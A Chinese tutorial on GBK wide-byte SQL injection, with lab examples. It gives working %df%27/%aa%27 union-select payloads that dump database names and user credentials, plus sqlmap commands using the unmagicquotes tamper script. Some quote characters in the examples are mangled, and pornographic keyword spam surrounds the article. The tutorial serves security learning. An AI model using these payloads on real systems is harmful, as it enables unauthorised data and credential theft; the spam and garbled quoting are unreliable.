日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

SQL注入寬字節注入由淺到深學習

瀏覽:231日期:2022-06-06 15:00:49
目錄
  • 前言
  • 基礎知識
    • 寬字節
    • 寬字節注入
  • 例子
    • 例題一
    • 例題二
  • SQLMAP應用
    • 結語

      前言

      突然想起來之前講SQL注入時忘記講一下這個寬字節注入了,因為這個知識點還是挺重要的,所以本文就帶大家了解一下寬字節注入的原理以及應用方法,下面由我來給大家詳細講解一下。

      基礎知識

      寬字節

      在了解寬字節注入之前,我們要了解一下什么是寬字節,相對于單字節,我們引入一個字符數大小為兩個字節的為寬字節,比如GBK編碼,我們漢字通常使用的就是GBK編碼,也就是說一次性會讀取兩個字節。

      寬字節注入

      產生寬字節注入的原因涉及了編碼轉換的問題,當我們的mysql使用GBK編碼后,同時兩個字符的前一個字符ASCII碼大于128時,會將兩個字符認成一個漢字,那么大家像一個,如果存在過濾我們輸入的函數(addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc)會將我們的輸入進行轉義,那么我們是不是可以嘗試注入,我們舉一個簡單的例子:

      addslashes()函數

      該函數的作用是返回在預定義字符之前添加反斜杠的字符串。于是我們可以分析一下我們轉入的參數流程:

      假設我們傳入一個參數id為1'查看數據庫是否錯報:

      index.php?id=1"

      那么經過函數過濾后我們的輸入拼接到sql語句就會變成:

      select * from user where id = "1""

      可以看到單引號被轉義了,加入我們像下面一樣傳參:

      可以看到我們傳入的參數與\合并成了一個漢字,具體可以參考下圖:

      可以看到我們的單引號沒有被轉義,從而達到了閉合單引號的效果,這就是一個簡單的寬字節注入。但是需要有個前提,也就是MYSQL設置了GBK編碼:

      SET character_set_client =gbk

      例子

      例題一

      進入頁面發現url可以有個變量id可以傳入參數,于是我們傳參測試是否報錯

      ?id=1"

      發現單引號被轉義了,數據庫沒有進行錯報,具體可以看下圖:

      結合我們上面學習到的寬字節注入的知識,懷疑是addslashes函數轉義了我們的單引號,于是我們嘗試進行繞過,我們先查詢列數:

      ?id=1%aa%27 order by 3--+

      發現列數為三后,判斷回顯位置:

      ?id=-1%aa%27union select 1,2,database()--+

      成功爆出了數據庫的名字,于是后面操作就跟平常的SQL注入一樣了:

      ?id=-1%aa%27union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+

      例題二

      打開網頁有一個查詢框讓我們進行查詢,我們嘗試加入單引號但發現沒有報錯,于是查看下源碼看看有沒有有用信息:

      gb2312正是漢字編碼字符集,于是我們嘗試寬字節注入:

      ?id=1%df%27%20union%20select%201,database()%23

      成功回顯了數據庫的名字,說明可行,于是我們繼續注入:

      ?id=1%df%27%20union%20select%201,string%20from%20sql5.key%20--%20

      得到了我們想要查詢的信息。

      SQLMAP應用

      SQLMAP作為一個強大的SQL注入自動化工具也是可以進行寬字節注入測試的,下面我們來學習一下利用SQLMAP走一遍寬字節注入的流程:

      先跑數據庫名:

      sqlmap.py -u "http://sql/index.php?id=3" --tamper unmagicquotes --dbs

      其中tamper為利用SQLMAP中自帶的腳本,當然我們也可以手動導入,而unmagicquotes為我們寬字節注入利用的腳本,下面查詢表名:

      index.php?id=3" --tamper unmagicquotes -D "xino" --tables

      爆出來表名后爆列名:

      index.php?id=3" --tamper unmagicquotes -D `xino` -T ctf --columns

      之后我們爆出數據:

      id=3" --tamper unmagicquotes -D `xino` -T ctf -C flag

      SQLMAP中進行寬字節注入還是比較簡單的,只需要注意我們利用到了sqlmap的寬字節注入腳本,其他的跟平時注入并沒有很大的差別。

      結語

      今天總結了一下寬字節注入的原理以及應用方法,整的來看寬字節注入的利用環境就是當我們的單引號被轉義了不能進行注入時可以考慮利用寬字符的編碼解析特性來進行單引號的逃逸,認真學習一下還是比較容易理解的,更多關于SQL寬字節注入的資料請關注其它相關文章!

      標簽: PHP
      相關文章:
      日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
      久久影视三级福利片| japanese国产精品| 免播放器亚洲| 99国产精品久久久久久久成人热 | 黑人精品一区| 国产一区二区三区精品在线观看| 美女视频黄免费的久久| 国产一区一一区高清不卡| 国产一区二区三区四区五区| 福利片在线一区二区| 成人福利av| 欧美va天堂在线| 首页欧美精品中文字幕| 日韩激情视频网站| 欧美日韩精品一区二区三区在线观看| 91九色综合| 久久精品国产99国产| 国产欧美一区二区三区精品酒店| 日韩精品欧美激情一区二区| 尤物网精品视频| 婷婷综合亚洲| 亚洲一区二区日韩| 国产丝袜一区| 国产精品黑丝在线播放| 欧美一区二区三区激情视频| 蜜桃一区二区三区在线观看| 国产亚洲高清一区| 日本不良网站在线观看| 亚洲韩日在线| 亚洲影院天堂中文av色| 国产亚洲电影| 日本在线精品| 视频在线观看一区| 国产福利一区二区精品秒拍| 电影天堂国产精品| 亚洲精品四区| 国内精品麻豆美女在线播放视频| 亚洲婷婷免费| 欧美在线91| 亚洲精品在线影院| 亚洲精品麻豆| 麻豆一区二区99久久久久| av高清不卡| 蜜臀a∨国产成人精品| 国产精品一级在线观看| 香蕉成人av| 日韩国产欧美在线视频| 91欧美日韩| 久久福利一区| 国产成人精品亚洲线观看| 亚洲永久字幕| 精品国产乱码久久久久久樱花| 免费观看久久av| 国产毛片精品| 合欧美一区二区三区| 麻豆91小视频| 免费在线观看日韩欧美| 精品三级国产| 欧美一级专区| 九九久久国产| 99日韩精品| 久久精品国产成人一区二区三区| 亚洲欧美网站| 新版的欧美在线视频| 亚洲精品黄色| 久久亚洲在线| 欧美黑人巨大videos精品| 夜夜嗨一区二区三区| 成人精品高清在线视频| 综合亚洲自拍| 亚洲va中文在线播放免费| 日韩一二三区在线观看| 久久国产主播| 国产精品毛片aⅴ一区二区三区| 精品一区三区| 精品视频高潮| 国产视频一区二区在线播放| 亚洲主播在线| 免费高潮视频95在线观看网站| 91欧美极品| 伊人久久亚洲热| 欧美成人a交片免费看| 欧美精品97| 91午夜精品| 亚洲精品综合| 99视频在线精品国自产拍免费观看| 美女久久久精品| 日韩精品社区| 999在线观看精品免费不卡网站| 国产中文字幕一区二区三区| 亚洲日本欧美| 国产毛片一区| 久久久久久久久久久9不雅视频| 欧美精品97| 国产伦精品一区二区三区在线播放| 日韩在线a电影| 国产精品99一区二区| 亚洲一区资源| 国产96在线亚洲| 久久中文字幕一区二区| 国产探花在线精品一区二区| 亚洲开心激情| 免费日韩av| 亚洲免费网址| 欧美成人综合| 成人日韩在线| 在线手机中文字幕| 激情综合五月| 精品久久中文| 麻豆一区二区在线| 久久gogo国模啪啪裸体| 国产精品嫩模av在线| 日本久久二区| 国产亚洲精品美女久久| 国产区精品区| 国产欧美三级| 国产精品v日韩精品v欧美精品网站| 69堂免费精品视频在线播放| 日韩三区四区| 日韩久久99| 亚洲有吗中文字幕| 亚洲伊人影院| 亚州国产精品| 日韩福利视频一区| 国产日韩亚洲欧美精品| 国产极品一区| 国产suv精品一区| 六月婷婷综合| 久久精品一区二区不卡| 91久久久精品国产| 女人天堂亚洲aⅴ在线观看| 欧美成人日韩| 免费精品视频| 亚洲精品成人一区| 久久国产欧美日韩精品| 国产视频一区二区在线播放| 久久99蜜桃| 亚洲综合电影| 影音国产精品| 日韩精品久久久久久| 国产精品欧美一区二区三区不卡| 久久精品国产久精国产| 亚洲综合在线电影| 好吊视频一区二区三区四区| 丝袜a∨在线一区二区三区不卡| 亚洲午夜国产成人| 7m精品国产导航在线| 精品国产黄a∨片高清在线| 久久久久国产精品一区二区| 夜夜精品视频| 亚洲精品乱码日韩| 国产精品密蕾丝视频下载| 人人草在线视频| 国产视频亚洲| 欧美日韩视频免费看| 国产乱码午夜在线视频| 欧美日韩免费观看一区=区三区| 中文字幕日韩亚洲| 欧美精品二区| 99成人超碰| 天堂久久一区| 91亚洲人成网污www| 国产毛片一区| 久久成人av| 亚洲午夜视频| 日韩福利在线观看| 91免费精品| 视频一区欧美精品| 欧美国产视频| 亚洲黄页一区| 欧美国产极品| 日韩午夜av在线| 国产精品一级在线观看| 久久久精品午夜少妇| 日本综合精品一区| 亚洲黄色网址| 亚州av日韩av| 日韩成人高清| 日本精品一区二区三区在线观看视频| 精品国产不卡一区二区| 女人av一区| 国产精品久久久久9999高清| 国产91久久精品一区二区| 国产图片一区| 黄色av日韩| 欧美激情福利| 妖精视频成人观看www| 麻豆成人在线观看| 丝袜脚交一区二区| 国产精品久久久久久久免费观看 | 欧美日韩日本国产亚洲在线| 69精品国产久热在线观看| 日韩精品一区二区三区免费观影| 香蕉久久一区| 久久婷婷丁香| 国产另类在线| 久久午夜精品| 天堂√8在线中文| 欧美精品福利| 亚洲自啪免费|